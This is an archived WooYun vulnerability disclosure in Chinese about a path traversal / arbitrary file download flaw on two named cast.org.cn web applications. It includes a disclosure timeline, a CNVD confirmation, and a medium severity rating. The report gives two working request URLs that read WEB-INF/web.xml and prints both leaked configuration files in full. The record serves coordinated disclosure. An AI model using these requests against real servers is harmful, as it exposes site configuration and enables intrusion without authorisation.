乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-09: 细节已通知厂商并且等待厂商处理中 2015-06-09: 厂商已经确认,细节仅向厂商公开 2015-06-19: 细节向核心白帽子及相关领域专家公开 2015-06-29: 细节向普通白帽子公开 2015-07-09: 细节向实习白帽子公开 2015-07-24: 细节向公众公开
科协。。china
http://app01.cast.org.cn:7050/download/download.jsp?filepath=/WEB-INF/web.xml
http://kpym.cast.org.cn/web/download.jsp?fileName=../WEB-INF/web.xml
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd"><web-app> <listener> <listener-class>com.jalor.session.SessionListener</listener-class> </listener> <!-- Standard Action Servlet Configuration (with debugging) --> <servlet> <servlet-name>action</servlet-name> <servlet-class>org.apache.struts.action.ActionServlet</servlet-class> <init-param> <param-name>config</param-name> <param-value>/WEB-INF/struts-config.xml</param-value> </init-param> <init-param> <param-name>debug</param-name> <param-value>0</param-value> </init-param> <init-param> <param-name>detail</param-name> <param-value>0</param-value> </init-param> <load-on-startup>2</load-on-startup> </servlet> <servlet> <servlet-name>PortalConfig</servlet-name> <servlet-class>com.jalor.JalorInitConfigServlet</servlet-class> <load-on-startup>1</load-on-startup> </servlet> <servlet-mapping> <servlet-name>action</servlet-name> <url-pattern>*.do</url-pattern> </servlet-mapping> <welcome-file-list> <welcome-file>index.jsp</welcome-file> </welcome-file-list> <taglib> <taglib-uri>http://jsptags.com/tags/navigation/pager</taglib-uri> <taglib-location>/WEB-INF/pager-taglib.tld</taglib-location> </taglib> <taglib> <taglib-uri>/WEB-INF/page-deal.tld</taglib-uri> <taglib-location>/WEB-INF/page-deal.tld</taglib-location> </taglib> <taglib> <taglib-uri>http://jakarta.apache.org/struts/tags-html</taglib-uri> <taglib-location>/WEB-INF/struts-html.tld</taglib-location> </taglib> <taglib> <taglib-uri>http://jakarta.apache.org/struts/tags-bean</taglib-uri> <taglib-location>/WEB-INF/struts-bean.tld</taglib-location> </taglib> <taglib> <taglib-uri>http://jakarta.apache.org/struts/tags-logic</taglib-uri> <taglib-location>/WEB-INF/struts-logic.tld</taglib-location> </taglib></web-app>
<?xml version="1.0" encoding="UTF-8"?><!-- edited with XMLSPY v5 rel. 4 U (http://www.xmlspy.com) by rth77 (rth77) --><!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://java.sun.com/dtd/web-app_2_3.dtd"><web-app character-encoding="UTF-8"> <servlet> <servlet-name>CGIServlet</servlet-name> <servlet-class>weblogic.servlet.CGIServlet</servlet-class> <init-param> <param-name>cgiDir</param-name> <param-value>/manager/MyAnalyse/cgi-bin</param-value> </init-param> <init-param> <param-name>*.pl</param-name> <param-value>d:perl/bin/perl.exe</param-value> </init-param></servlet><servlet-mapping> <servlet-name>CGIServlet</servlet-name> <url-pattern>/cgi-bin/*</url-pattern></servlet-mapping> <session-config> <session-timeout>240</session-timeout> </session-config> <servlet> <servlet-name>test1</servlet-name> <servlet-class>ehm.web.cast.info.app.Servlet1</servlet-class> </servlet> <servlet-mapping> <servlet-name>test1</servlet-name> <url-pattern>/test1</url-pattern> </servlet-mapping><welcome-file-list> <welcome-file>index.html</welcome-file> <welcome-file>index.jsp</welcome-file> <welcome-file>index.htm</welcome-file> </welcome-file-list></web-app>
危害等级:中
漏洞Rank:7
确认时间:2015-06-09 13:45
CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。
暂无